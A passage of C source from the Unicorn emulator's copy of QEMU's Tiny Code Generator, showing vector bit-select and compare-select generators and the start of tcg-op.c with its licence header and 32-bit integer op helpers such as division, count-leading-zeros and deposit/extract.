tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGTemp *bt = tcgv_vec_temp(tcg_ctx, b); TCGTemp *ct = tcgv_vec_temp(tcg_ctx, c); TCGType type = rt->base_type; tcg_debug_assert(at->base_type >= type); tcg_debug_assert(bt->base_type >= type); tcg_debug_assert(ct->base_type >= type); if (TCG_TARGET_HAS_bitsel_vec) { vec_gen_4(tcg_ctx, INDEX_op_bitsel_vec, type, MO_8, temp_arg(rt), temp_arg(at), temp_arg(bt), temp_arg(ct)); } else { 
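/* Generic fallback: compute r = (b & a) | (c & ~a), so each result bit comes from b where the selector a is 1, and from c where it is 0. */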
TCGv_vec t = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_and_vec(tcg_ctx, MO_8, t, a, b); tcg_gen_andc_vec(tcg_ctx, MO_8, r, c, a); tcg_gen_or_vec(tcg_ctx, MO_8, r, r, t); tcg_temp_free_vec(tcg_ctx, t); } } void tcg_gen_cmpsel_vec(TCGContext *tcg_ctx, TCGCond cond, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b, TCGv_vec c, TCGv_vec d) { TCGTemp *rt = tcgv_vec_temp(tcg_ctx, r); TCGTemp *at = tcgv_vec_temp(tcg_ctx, a); TCGTemp *bt = tcgv_vec_temp(tcg_ctx, b); TCGTemp *ct = tcgv_vec_temp(tcg_ctx, c); TCGTemp *dt = tcgv_vec_temp(tcg_ctx, d); TCGArg ri = temp_arg(rt); TCGArg ai = temp_arg(at); TCGArg bi = temp_arg(bt); TCGArg ci = temp_arg(ct); TCGArg di = temp_arg(dt); TCGType type = rt->base_type; const TCGOpcode *hold_list; int can; tcg_debug_assert(at->base_type >= type); tcg_debug_assert(bt->base_type >= type); tcg_debug_assert(ct->base_type >= type); tcg_debug_assert(dt->base_type >= type); tcg_assert_listed_vecop(INDEX_op_cmpsel_vec); hold_list = tcg_swap_vecop_list(NULL); can = tcg_can_emit_vec_op(tcg_ctx, INDEX_op_cmpsel_vec, type, vece); if (can > 0) { vec_gen_6(tcg_ctx, INDEX_op_cmpsel_vec, type, vece, ri, ai, bi, ci, di, cond); } else if (can < 0) { tcg_expand_vec_op(tcg_ctx, INDEX_op_cmpsel_vec, type, vece, ri, ai, bi, ci, di, cond); } else { TCGv_vec t = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_cmp_vec(tcg_ctx, cond, vece, t, a, b); tcg_gen_bitsel_vec(tcg_ctx, vece, r, t, c, d); tcg_temp_free_vec(tcg_ctx, t); } tcg_swap_vecop_list(hold_list); }
unicorn-2.1.1/qemu/tcg/tcg-op.c
/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "tcg/tcg.h" #include "tcg/tcg-op.h" #include "tcg/tcg-mo.h" #include "trace/mem.h" /* Reduce the number of ifdefs below. This assumes that all uses of TCGV_HIGH and TCGV_LOW are properly protected by a conditional that the compiler can eliminate. */ #if TCG_TARGET_REG_BITS == 64 extern TCGv_i32 TCGV_LOW_link_error(TCGv_i64); extern TCGv_i32 TCGV_HIGH_link_error(TCGv_i64); #define TCGV_LOW TCGV_LOW_link_error #define TCGV_HIGH TCGV_HIGH_link_error #endif void tcg_gen_op1(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); op->args[0] = a1; } void tcg_gen_op2(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1, TCGArg a2) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); op->args[0] = a1; op->args[1] = a2; } void tcg_gen_op3(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1, TCGArg a2, TCGArg a3) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); op->args[0] = a1; op->args[1] = a2; op->args[2] = a3; } void tcg_gen_op4(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1, TCGArg a2, TCGArg a3, TCGArg a4) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); op->args[0] = a1; op->args[1] = a2; op->args[2] = a3; op->args[3] = a4; } void tcg_gen_op5(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1, TCGArg a2, TCGArg a3, TCGArg a4, TCGArg a5) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); op->args[0] = a1; op->args[1] = a2; op->args[2] = a3; op->args[3] = a4; op->args[4] = a5; } void tcg_gen_op6(TCGContext *tcg_ctx, TCGOpcode opc, TCGArg a1, TCGArg a2, TCGArg a3, TCGArg a4, TCGArg a5, TCGArg a6) { TCGOp *op = tcg_emit_op(tcg_ctx, opc); op->args[0] = a1; op->args[1] = a2; op->args[2] = a3; op->args[3] = a4; op->args[4] = a5; op->args[5] = a6; } void tcg_gen_mb(TCGContext *tcg_ctx, TCGBar mb_type) { if (tcg_ctx->tb_cflags & CF_PARALLEL) { tcg_gen_op1(tcg_ctx, INDEX_op_mb, mb_type); } } /* 32 bit ops */ void tcg_gen_addi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { /* some cases can be optimized here */ if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_add_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_subfi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, int32_t arg1, TCGv_i32 arg2) { if (arg1 == 0 && TCG_TARGET_HAS_neg_i32) { /* Don't recurse with tcg_gen_neg_i32. */ tcg_gen_op2_i32(tcg_ctx, INDEX_op_neg_i32, ret, arg2); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg1); tcg_gen_sub_i32(tcg_ctx, ret, t0, arg2); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_subi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { /* some cases can be optimized here */ if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_sub_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_andi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { TCGv_i32 t0; /* Some cases can be optimized here. */ switch (arg2) { case 0: tcg_gen_movi_i32(tcg_ctx, ret, 0); return; case -1: tcg_gen_mov_i32(tcg_ctx, ret, arg1); return; case 0xff: /* Don't recurse with tcg_gen_ext8u_i32. 
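(When the ext8u opcode is unavailable, tcg_gen_ext8u_i32 is itself expected to fall back to an AND with 0xff, which would lead straight back into this function.)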
*/ if (TCG_TARGET_HAS_ext8u_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_ext8u_i32, ret, arg1); return; } break; case 0xffff: if (TCG_TARGET_HAS_ext16u_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_ext16u_i32, ret, arg1); return; } break; } t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_and_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } void tcg_gen_ori_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { /* Some cases can be optimized here. */ if (arg2 == -1) { tcg_gen_movi_i32(tcg_ctx, ret, -1); } else if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_or_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_xori_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { /* Some cases can be optimized here. */ if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else if (arg2 == -1 && TCG_TARGET_HAS_not_i32) { /* Don't recurse with tcg_gen_not_i32. */ tcg_gen_op2_i32(tcg_ctx, INDEX_op_not_i32, ret, arg1); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_xor_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_shli_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { tcg_debug_assert(arg2 >= 0 && arg2 < 32); if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_shl_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_shri_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { tcg_debug_assert(arg2 >= 0 && arg2 < 32); if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_shr_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_sari_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { tcg_debug_assert(arg2 >= 0 && arg2 < 32); if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_sar_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_brcond_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 arg1, TCGv_i32 arg2, TCGLabel *l) { if (cond == TCG_COND_ALWAYS) { tcg_gen_br(tcg_ctx, l); } else if (cond != TCG_COND_NEVER) { l->refs++; tcg_gen_op4ii_i32(tcg_ctx, INDEX_op_brcond_i32, arg1, arg2, cond, label_arg(l)); } } void tcg_gen_brcondi_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 arg1, int32_t arg2, TCGLabel *l) { if (cond == TCG_COND_ALWAYS) { tcg_gen_br(tcg_ctx, l); } else if (cond != TCG_COND_NEVER) { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_brcond_i32(tcg_ctx, cond, arg1, t0, l); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_setcond_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (cond == TCG_COND_ALWAYS) { tcg_gen_movi_i32(tcg_ctx, ret, 1); } else if (cond == TCG_COND_NEVER) { tcg_gen_movi_i32(tcg_ctx, ret, 0); } else { tcg_gen_op4i_i32(tcg_ctx, INDEX_op_setcond_i32, ret, arg1, arg2, cond); } } void tcg_gen_setcondi_i32(TCGContext *tcg_ctx, TCGCond cond, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_setcond_i32(tcg_ctx, cond, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } void tcg_gen_muli_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, int32_t arg2) { if (arg2 == 0) { tcg_gen_movi_i32(tcg_ctx, ret, 0); } else if (is_power_of_2(arg2)) { tcg_gen_shli_i32(tcg_ctx, ret, arg1, ctz32(arg2)); } else { TCGv_i32 t0 = 
tcg_const_i32(tcg_ctx, arg2); tcg_gen_mul_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_div_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_div_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_div_i32, ret, arg1, arg2); } else if (TCG_TARGET_HAS_div2_i32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_sari_i32(tcg_ctx, t0, arg1, 31); tcg_gen_op5_i32(tcg_ctx, INDEX_op_div2_i32, ret, t0, arg1, t0, arg2); tcg_temp_free_i32(tcg_ctx, t0); } else { gen_helper_div_i32(tcg_ctx, ret, arg1, arg2); } } void tcg_gen_rem_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_rem_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_rem_i32, ret, arg1, arg2); } else if (TCG_TARGET_HAS_div_i32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_op3_i32(tcg_ctx, INDEX_op_div_i32, t0, arg1, arg2); tcg_gen_mul_i32(tcg_ctx, t0, t0, arg2); tcg_gen_sub_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } else if (TCG_TARGET_HAS_div2_i32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_sari_i32(tcg_ctx, t0, arg1, 31); tcg_gen_op5_i32(tcg_ctx, INDEX_op_div2_i32, t0, ret, arg1, t0, arg2); tcg_temp_free_i32(tcg_ctx, t0); } else { gen_helper_rem_i32(tcg_ctx, ret, arg1, arg2); } } void tcg_gen_divu_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_div_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_divu_i32, ret, arg1, arg2); } else if (TCG_TARGET_HAS_div2_i32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, t0, 0); tcg_gen_op5_i32(tcg_ctx, INDEX_op_divu2_i32, ret, t0, arg1, t0, arg2); tcg_temp_free_i32(tcg_ctx, t0); } else { gen_helper_divu_i32(tcg_ctx, ret, arg1, arg2); } } void tcg_gen_remu_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_rem_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_remu_i32, ret, arg1, arg2); } else if (TCG_TARGET_HAS_div_i32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_op3_i32(tcg_ctx, INDEX_op_divu_i32, t0, arg1, arg2); tcg_gen_mul_i32(tcg_ctx, t0, t0, arg2); tcg_gen_sub_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } else if (TCG_TARGET_HAS_div2_i32) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, t0, 0); tcg_gen_op5_i32(tcg_ctx, INDEX_op_divu2_i32, t0, ret, arg1, t0, arg2); tcg_temp_free_i32(tcg_ctx, t0); } else { gen_helper_remu_i32(tcg_ctx, ret, arg1, arg2); } } void tcg_gen_andc_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_andc_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_andc_i32, ret, arg1, arg2); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_not_i32(tcg_ctx, t0, arg2); tcg_gen_and_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_eqv_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_eqv_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_eqv_i32, ret, arg1, arg2); } else { tcg_gen_xor_i32(tcg_ctx, ret, arg1, arg2); tcg_gen_not_i32(tcg_ctx, ret, ret); } } void tcg_gen_nand_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_nand_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_nand_i32, ret, arg1, arg2); } else { tcg_gen_and_i32(tcg_ctx, ret, arg1, arg2); tcg_gen_not_i32(tcg_ctx, ret, ret); } } void tcg_gen_nor_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_nor_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_nor_i32, ret, arg1, arg2); } else { tcg_gen_or_i32(tcg_ctx, ret,
arg1, arg2); tcg_gen_not_i32(tcg_ctx, ret, ret); } } void tcg_gen_orc_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_orc_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_orc_i32, ret, arg1, arg2); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_not_i32(tcg_ctx, t0, arg2); tcg_gen_or_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } } void tcg_gen_clz_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_clz_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_clz_i32, ret, arg1, arg2); } else if (TCG_TARGET_HAS_clz_i64) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t1, arg1); tcg_gen_extu_i32_i64(tcg_ctx, t2, arg2); tcg_gen_addi_i64(tcg_ctx, t2, t2, 32); tcg_gen_clz_i64(tcg_ctx, t1, t1, t2); tcg_gen_extrl_i64_i32(tcg_ctx, ret, t1); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_gen_subi_i32(tcg_ctx, ret, ret, 32); } else { gen_helper_clz_i32(tcg_ctx, ret, arg1, arg2); } } void tcg_gen_clzi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, uint32_t arg2) { TCGv_i32 t = tcg_const_i32(tcg_ctx, arg2); tcg_gen_clz_i32(tcg_ctx, ret, arg1, t); tcg_temp_free_i32(tcg_ctx, t); } void tcg_gen_ctz_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_ctz_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_ctz_i32, ret, arg1, arg2); } else if (TCG_TARGET_HAS_ctz_i64) { TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t1, arg1); tcg_gen_extu_i32_i64(tcg_ctx, t2, arg2); tcg_gen_ctz_i64(tcg_ctx, t1, t1, t2); tcg_gen_extrl_i64_i32(tcg_ctx, ret, t1); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); } else if (TCG_TARGET_HAS_ctpop_i32 || TCG_TARGET_HAS_ctpop_i64 || TCG_TARGET_HAS_clz_i32 || TCG_TARGET_HAS_clz_i64) { TCGv_i32 z, t = tcg_temp_new_i32(tcg_ctx); if (TCG_TARGET_HAS_ctpop_i32 || TCG_TARGET_HAS_ctpop_i64) { tcg_gen_subi_i32(tcg_ctx, t, arg1, 1); tcg_gen_andc_i32(tcg_ctx, t, t, arg1); tcg_gen_ctpop_i32(tcg_ctx, t, t); } else { /* Since all non-x86 hosts have clz(0) == 32, don't fight it. */ tcg_gen_neg_i32(tcg_ctx, t, arg1); tcg_gen_and_i32(tcg_ctx, t, t, arg1); tcg_gen_clzi_i32(tcg_ctx, t, t, 32); tcg_gen_xori_i32(tcg_ctx, t, t, 31); } z = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, ret, arg1, z, arg2, t); tcg_temp_free_i32(tcg_ctx, t); tcg_temp_free_i32(tcg_ctx, z); } else { gen_helper_ctz_i32(tcg_ctx, ret, arg1, arg2); } } void tcg_gen_ctzi_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, uint32_t arg2) { if (!TCG_TARGET_HAS_ctz_i32 && TCG_TARGET_HAS_ctpop_i32 && arg2 == 32) { /* This equivalence has the advantage of not requiring a fixup.
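* The identity used is ctz(x) == ctpop((x - 1) & ~x) when arg2 == 32. * As a worked example: x = 0b01000 gives (x - 1) & ~x == 0b00111 and a * population count of 3, while x == 0 gives 0xffffffff and a count of 32, * exactly the arg2 == 32 result that would otherwise need a fixup.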
*/ TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_subi_i32(tcg_ctx, t, arg1, 1); tcg_gen_andc_i32(tcg_ctx, t, t, arg1); tcg_gen_ctpop_i32(tcg_ctx, ret, t); tcg_temp_free_i32(tcg_ctx, t); } else { TCGv_i32 t = tcg_const_i32(tcg_ctx, arg2); tcg_gen_ctz_i32(tcg_ctx, ret, arg1, t); tcg_temp_free_i32(tcg_ctx, t); } } void tcg_gen_clrsb_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg) { if (TCG_TARGET_HAS_clz_i32) { TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_sari_i32(tcg_ctx, t, arg, 31); tcg_gen_xor_i32(tcg_ctx, t, t, arg); tcg_gen_clzi_i32(tcg_ctx, t, t, 32); tcg_gen_subi_i32(tcg_ctx, ret, t, 1); tcg_temp_free_i32(tcg_ctx, t); } else { gen_helper_clrsb_i32(tcg_ctx, ret, arg); } } void tcg_gen_ctpop_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1) { if (TCG_TARGET_HAS_ctpop_i32) { tcg_gen_op2_i32(tcg_ctx, INDEX_op_ctpop_i32, ret, arg1); } else if (TCG_TARGET_HAS_ctpop_i64) { TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t, arg1); tcg_gen_ctpop_i64(tcg_ctx, t, t); tcg_gen_extrl_i64_i32(tcg_ctx, ret, t); tcg_temp_free_i64(tcg_ctx, t); } else { gen_helper_ctpop_i32(tcg_ctx, ret, arg1); } } void tcg_gen_rotl_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_rot_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_rotl_i32, ret, arg1, arg2); } else { TCGv_i32 t0, t1; t0 = tcg_temp_new_i32(tcg_ctx); t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shl_i32(tcg_ctx, t0, arg1, arg2); tcg_gen_subfi_i32(tcg_ctx, t1, 32, arg2); tcg_gen_shr_i32(tcg_ctx, t1, arg1, t1); tcg_gen_or_i32(tcg_ctx, ret, t0, t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } } void tcg_gen_rotli_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, unsigned arg2) { tcg_debug_assert(arg2 < 32); /* some cases can be optimized here */ if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else if (TCG_TARGET_HAS_rot_i32) { TCGv_i32 t0 = tcg_const_i32(tcg_ctx, arg2); tcg_gen_rotl_i32(tcg_ctx, ret, arg1, t0); tcg_temp_free_i32(tcg_ctx, t0); } else { TCGv_i32 t0, t1; t0 = tcg_temp_new_i32(tcg_ctx); t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shli_i32(tcg_ctx, t0, arg1, arg2); tcg_gen_shri_i32(tcg_ctx, t1, arg1, 32 - arg2); tcg_gen_or_i32(tcg_ctx, ret, t0, t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } } void tcg_gen_rotr_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2) { if (TCG_TARGET_HAS_rot_i32) { tcg_gen_op3_i32(tcg_ctx, INDEX_op_rotr_i32, ret, arg1, arg2); } else { TCGv_i32 t0, t1; t0 = tcg_temp_new_i32(tcg_ctx); t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_shr_i32(tcg_ctx, t0, arg1, arg2); tcg_gen_subfi_i32(tcg_ctx, t1, 32, arg2); tcg_gen_shl_i32(tcg_ctx, t1, arg1, t1); tcg_gen_or_i32(tcg_ctx, ret, t0, t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } } void tcg_gen_rotri_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, unsigned arg2) { tcg_debug_assert(arg2 < 32); /* some cases can be optimized here */ if (arg2 == 0) { tcg_gen_mov_i32(tcg_ctx, ret, arg1); } else { tcg_gen_rotli_i32(tcg_ctx, ret, arg1, 32 - arg2); } } void tcg_gen_deposit_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg1, TCGv_i32 arg2, unsigned int ofs, unsigned int len) { uint32_t mask; TCGv_i32 t1; tcg_debug_assert(ofs < 32); tcg_debug_assert(len > 0); tcg_debug_assert(len <= 32); tcg_debug_assert(ofs + len <= 32); if (len == 32) { tcg_gen_mov_i32(tcg_ctx, ret, arg2); return; } if (TCG_TARGET_HAS_deposit_i32 && TCG_TARGET_deposit_i32_valid(ofs, len)) { tcg_gen_op5ii_i32(tcg_ctx, INDEX_op_deposit_i32, ret, arg1, arg2, ofs, 
len); return; } t1 = tcg_temp_new_i32(tcg_ctx); if (TCG_TARGET_HAS_extract2_i32) { if (ofs + len == 32) { tcg_gen_shli_i32(tcg_ctx, t1, arg1, len); tcg_gen_extract2_i32(tcg_ctx, ret, t1, arg2, len); goto done; } if (ofs == 0) { tcg_gen_extract2_i32(tcg_ctx, ret, arg1, arg2, len); tcg_gen_rotli_i32(tcg_ctx, ret, ret, len); goto done; } } mask = (1u << len) - 1; if (ofs + len < 32) { tcg_gen_andi_i32(tcg_ctx, t1, arg2, mask); tcg_gen_shli_i32(tcg_ctx, t1, t1, ofs); } else { tcg_gen_shli_i32(tcg_ctx, t1, arg2, ofs); } tcg_gen_andi_i32(tcg_ctx, ret, arg1, ~(mask << ofs)); tcg_gen_or_i32(tcg_ctx, ret, ret, t1); done: tcg_temp_free_i32(tcg_ctx, t1); } void tcg_gen_deposit_z_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg, unsigned int ofs, unsigned int len) { tcg_debug_assert(ofs < 32); tcg_debug_assert(len > 0); tcg_debug_assert(len <= 32); tcg_debug_assert(ofs + len <= 32); if (ofs + len == 32) { tcg_gen_shli_i32(tcg_ctx, ret, arg, ofs); } else if (ofs == 0) { tcg_gen_andi_i32(tcg_ctx, ret, arg, (1u << len) - 1); } else if (TCG_TARGET_HAS_deposit_i32 && TCG_TARGET_deposit_i32_valid(ofs, len)) { TCGv_i32 zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_op5ii_i32(tcg_ctx, INDEX_op_deposit_i32, ret, zero, arg, ofs, len); tcg_temp_free_i32(tcg_ctx, zero); } else { /* To help two-operand hosts we prefer to zero-extend first, which allows ARG to stay live. */ switch (len) { case 16: if (TCG_TARGET_HAS_ext16u_i32) { tcg_gen_ext16u_i32(tcg_ctx, ret, arg); tcg_gen_shli_i32(tcg_ctx, ret, ret, ofs); return; } break; case 8: if (TCG_TARGET_HAS_ext8u_i32) { tcg_gen_ext8u_i32(tcg_ctx, ret, arg); tcg_gen_shli_i32(tcg_ctx, ret, ret, ofs); return; } break; } /* Otherwise prefer zero-extension over AND for code size. */ switch (ofs + len) { case 16: if (TCG_TARGET_HAS_ext16u_i32) { tcg_gen_shli_i32(tcg_ctx, ret, arg, ofs); tcg_gen_ext16u_i32(tcg_ctx, ret, ret); return; } break; case 8: if (TCG_TARGET_HAS_ext8u_i32) { tcg_gen_shli_i32(tcg_ctx, ret, arg, ofs); tcg_gen_ext8u_i32(tcg_ctx, ret, ret); return; } break; } tcg_gen_andi_i32(tcg_ctx, ret, arg, (1u << len) - 1); tcg_gen_shli_i32(tcg_ctx, ret, ret, ofs); } } void tcg_gen_extract_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i32 arg, unsigned int ofs, unsigned int len) { tcg_debug_assert(ofs < 32); tcg_debug_assert(len > 0); tcg_debug_assert(len <= 32); tcg_debug_assert(ofs + len <= 32); /* 